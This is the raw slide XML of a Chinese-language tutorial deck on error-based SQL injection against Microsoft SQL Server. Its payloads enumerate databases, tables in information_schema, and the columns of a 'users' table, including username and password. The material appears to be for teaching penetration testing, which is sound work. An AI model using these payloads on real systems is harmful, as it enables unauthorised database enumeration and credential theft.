              <a:t>9</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、获取数据库的个数</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  </a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>and 1=(select quotename(count(name)) from master.sys.databases)</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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10</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>一次性获取所有数据库</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> and 1=(select quotename(name) from master.sys.databases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>FOR XML PATH('')</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>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报错注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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报错注入的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558709" y="1867213"/>
            <a:ext cx="12055731" cy="525021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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>9</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、获取第一个</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表名</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  </a:t>
            </a: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and</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 </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1=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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select top 1 </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table_name</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 </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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>information_schema.tables</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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11</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>、获取其他表名：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRP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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and 1=(select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>not in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>('emails') </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>说明：利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>not in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>依次遍历出所有表名，直到报错的时候，就是所有的表名都判断完成。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and 1=(select top 1 table_name from information_schema.tables where table_name not in(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>select top 2 table_name from information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172796">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and 1=(select quotename(table_name) from information_schema.tables FOR XML PATH(''))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="379297" defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2182239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报错注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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报错注入的过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A3338F-359A-4B43-A9B6-73A69C744A0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633575" y="1714746"/>
            <a:ext cx="11440784" cy="340355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defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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12</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、获取字段名：  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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payload</a:t>
            </a:r>
            <a:r>
              <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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>and 1=(</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select top 1 </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column_name</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 </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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>information_schema.columns</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 where </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table_name</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、获取所有字段名：利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>not in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>依次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>遍历出所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字段名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and 1=(</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select top 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>column_name</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 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>information_schema.columns</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 where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>table_name</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>users</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 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>column_name</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Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> not in</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>','username','password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>'))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="479988" indent="-307192">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRP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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>and 1=(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>quotename(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>column_name))</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
